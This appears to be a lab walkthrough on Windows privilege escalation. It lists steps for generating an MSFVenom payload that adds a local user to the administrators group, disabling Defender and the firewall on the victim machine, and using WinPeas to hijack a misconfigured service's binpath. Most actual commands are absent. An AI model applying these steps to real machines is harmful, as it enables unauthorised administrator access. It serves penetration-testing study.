Windows Privilege Escalation
Using WinPeas
Making use of an exe that is vulnerable to unquoted service paths
Target Windows machine has a non-privileged user: localuser
Use MSFVenom: Generate an executable to push the localuser to the administrators group (ASCService.exe)
1 . Generate Payload using MSFVenom
2. Start Web Server on Attack Machine
3. Disable Windows Defender & Firewall on Victim Windows Machine
Run the following as powershell administrators
4. Connect back to Attack Machine on Windows Victim via browser
Navigate and download the payloads
move these downloads to the C:/ folder
Next we will need to add permissions so that the local users are able to start and stop the service. This is how we simulate excessive permissions on a service.
You should see a response of [SC] SetServiceObjectSecurity SUCCESS.
Run Command Prompt as Different User
Search cmd > right click > run as diff user
Check which accounts are in local administrators group
C:\ > net localgroup administrators
Run WinPeas.exe
Run check for services information
A few sections often used for privilege escalation are the
Interesting Services -non Microsoft-
Modifiable Services sections.
Now query the service using
Next attempt to start and stop the service using:
Now we try to modify the service binpath to point to our new executable. Add a new additional user:
Now start our payload executable:
Since we have permissions and can modify the service itself, we leverage the service to add the localuser to the local admin group
Last updated